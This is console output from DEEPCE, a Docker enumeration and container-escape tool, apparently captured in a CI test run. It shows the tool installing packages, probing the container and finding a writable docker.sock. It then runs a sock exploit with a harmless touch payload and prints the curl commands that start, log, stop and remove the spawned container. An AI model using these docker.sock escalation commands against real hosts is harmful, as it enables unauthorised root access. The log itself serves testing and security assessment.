## . ## ## ## == ## ## ## ## === /"""""""""""""""""\___/ === ~~~ {~~ ~~~~ ~~~ ~~~~ ~~~ ~ / ===- ~~~ \______ X __/ \ \ __/ \____\_______/ __ ____/ /__ ___ ____ ________ / __ / _ \/ _ \/ __ \/ ___/ _ \ ENUMERATE / /_/ / __/ __/ /_/ / (__/ __/ ESCALATE \__,_/\___/\___/ .___/\___/\___/ ESCAPE /_/ Docker Enumeration, Escalation of Privileges and Container Escapes (DEEPCE) by stealthcopter ==========================================( Colors )========================================== [+] Exploit Test ............ Exploitable - Check this out [+] Basic Test .............. Positive Result [+] Another Test ............ Error running check [+] Negative Test ........... No [+] Multi line test ......... Yes Command output spanning multiple lines Tips will look like this and often contains links with additional info. You can usually ctrl+click links in modern terminal to open in a browser window See https://stealthcopter.github.io/deepce ===================================( Installing Packages )==================================== fetch https://dl-cdn.alpinelinux.org/alpine/v3.19/main/x86_64/APKINDEX.tar.gz fetch https://dl-cdn.alpinelinux.org/alpine/v3.19/community/x86_64/APKINDEX.tar.gz (1/32) Installing fstrm (0.6.1-r4) (2/32) Installing krb5-conf (1.0-r2) (3/32) Installing libcom_err (1.47.0-r5) (4/32) Installing keyutils-libs (1.6.3-r3) (5/32) Installing libverto (0.3.2-r2) (6/32) Installing krb5-libs (1.21.2-r0) (7/32) Installing json-c (0.17-r0) (8/32) Installing nghttp2-libs (1.58.0-r0) (9/32) Installing protobuf-c (1.4.1-r7) (10/32) Installing libuv (1.47.0-r0) (11/32) Installing xz-libs (5.4.5-r0) (12/32) Installing libxml2 (2.11.6-r0) (13/32) Installing bind-libs (9.18.19-r1) (14/32) Installing bind-tools (9.18.19-r1) (15/32) Installing ca-certificates (20230506-r0) (16/32) Installing brotli-libs (1.1.0-r1) (17/32) Installing c-ares (1.22.1-r0) (18/32) Installing libunistring (1.1-r2) (19/32) Installing libidn2 (2.3.4-r4) (20/32) Installing libcurl (8.5.0-r0) (21/32) Installing curl (8.5.0-r0) (22/32) Installing libcap2 (2.69-r1) (23/32) Installing libcap-getcap (2.69-r1) (24/32) Installing libcap-setcap (2.69-r1) (25/32) Installing libcap-utils (2.69-r1) (26/32) Installing libcap (2.69-r1) (27/32) Installing libgcc (13.2.1_git20231014-r0) (28/32) Installing libpcap (1.10.4-r1) (29/32) Installing pcre (8.45-r3) (30/32) Installing libssh2 (1.11.0-r1) (31/32) Installing libstdc++ (13.2.1_git20231014-r0) (32/32) Installing nmap (7.94-r0) Executing busybox-1.36.1-r15.trigger Executing ca-certificates-20230506-r0.trigger OK: 35 MiB in 47 packages ===================================( Enumerating Platform )=================================== [+] Inside Container ........ Yes [+] Container Platform ...... docker [+] Container tools ......... None [+] User .................... root [+] Groups .................. root bin daemon sys adm disk wheel floppy dialout tape video [+] Sudoers ................. No [+] Docker Executable ....... Not Found [+] Docker Sock ............. Yes srw-rw---- 1 root 127 0 Dec 28 14:28 /var/run/docker.sock [+] Sock is writable ........ Yes The docker sock is writable, we should be able to enumerate docker, create containers and obtain root privs on the host machine See https://stealthcopter.github.io/deepce/guides/docker-sock.md To see full info from the docker sock output run the following curl -s --unix-socket /var/run/docker.sock http://localhost/info KernelVersion:6.2.0-1018-azure OperatingSystem:Ubuntu 22.04.3 LTS OSType:linux Architecture:x86_64 NCPU:4 DockerRootDir:/var/lib/docker Name:fv-az714-545 ServerVersion:24.0.7 [+] Docker Version .......... 24.0.7 [+] CVE–2019–13139 .......... No [+] CVE–2019–5736 ........... No ==================================( Enumerating Container )=================================== [+] Container ID ............ 24e2014fb4d7 [+] Container Full ID ....... / [+] Container Name .......... Could not get container name through reverse DNS [+] Container IP ............ 172.17.0.2 [+] DNS Server(s) ........... 168.63.129.16 [+] Host IP ................. 172.17.0.1 [+] Operating System ........ Linux [+] Kernel .................. 6.2.0-1018-azure [+] Arch .................... x86_64 [+] CPU ..................... AMD EPYC 7763 64-Core Processor [+] Useful tools installed .. Yes /usr/bin/curl /usr/bin/wget /usr/bin/nc /usr/bin/nslookup /usr/bin/host /bin/hostname /usr/bin/dig /usr/bin/nmap [+] Dangerous Capabilities .. Yes Current: cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap=ep Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap Current IAB: !cap_dac_read_search,!cap_linux_immutable,!cap_net_broadcast,!cap_net_admin,!cap_ipc_lock,!cap_ipc_owner,!cap_sys_module,!cap_sys_rawio,!cap_sys_ptrace,!cap_sys_pacct,!cap_sys_admin,!cap_sys_boot,!cap_sys_nice,!cap_sys_resource,!cap_sys_time,!cap_sys_tty_config,!cap_lease,!cap_audit_control,!cap_mac_override,!cap_mac_admin,!cap_syslog,!cap_wake_alarm,!cap_block_suspend,!cap_audit_read,!cap_perfmon,!cap_bpf,!cap_checkpoint_restore [+] SSHD Service ............ No [+] Privileged Mode ......... No [+] Alpine Linux Version .... 3.19.0 [+] └── CVE-2019-5021 ....... No ====================================( Enumerating Mounts )==================================== [+] Docker sock mounted ....... Yes The docker sock is writable, we should be able to enumerate docker, create containers and obtain root privs on the host machine See https://stealthcopter.github.io/deepce/guides/docker-sock.md [+] Other mounts .............. Yes /home/runner/work/deepce/deepce/deepce.sh /root/deepce.sh rw,relatime - ext4 /dev/root rw,discard,errors=remount-ro [+] Possible host usernames ... runner ====================================( Interesting Files )===================================== [+] Interesting environment variables ... No HOME=/root HOSTNAME=24e2014fb4d7 PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin PWD=/ SHLVL=1 [+] Any common entrypoint files ......... Yes -rwxr-xr-x 1 1001 127 38.5K Dec 28 14:30 /root/deepce.sh [+] Interesting files in root ........... No [+] Passwords in common files ........... No [+] Home directories .................... No [+] Hashes in shadow file ............... No [+] Searching for app dirs .............. ==================================( Enumerating Containers )================================== By default containers can communicate with other containers on the same network and the host machine, this can be used to enumerate further TODO Enumerate container using sock =====================================( Exploiting Sock )====================================== [+] Preparing Exploit [+] Exploit Type ............. Custom Command [+] Custom Command ........... touch /tmp/deepce-docker-alpine-payload-command.hacked [+] Clean up ................. Automatic on container exit [+] Creating container ..... ce327de8c3a3602966e11b9dae9bece8c9ce3df2841f6b399fc78c08c567e300 [+] If the shell dies you can restart your listener and run the start command to fire it again Start Command: curl -s -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/ce327de8c3a3602966e11b9dae9bece8c9ce3df2841f6b399fc78c08c567e300/start Logs Command: curl -s --unix-socket /var/run/docker.sock "http://localhost/containers/ce327de8c3a3602966e11b9dae9bece8c9ce3df2841f6b399fc78c08c567e300/logs?stderr=1&stdout=1" --output - [+] Once complete remember to tidy up by stopping and removing your container with following commands Stop Command: curl -s -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/ce327de8c3a3602966e11b9dae9bece8c9ce3df2841f6b399fc78c08c567e300/stop Remove Command: curl -s -XDELETE --unix-socket /var/run/docker.sock http://localhost/containers/ce327de8c3a3602966e11b9dae9bece8c9ce3df2841f6b399fc78c08c567e300 [+] Starting container ..... Success [+] Sleeping for ........... 2s [+] Fetching logs .......... Success [+] Exploit completed ..... :) ==============================================================================================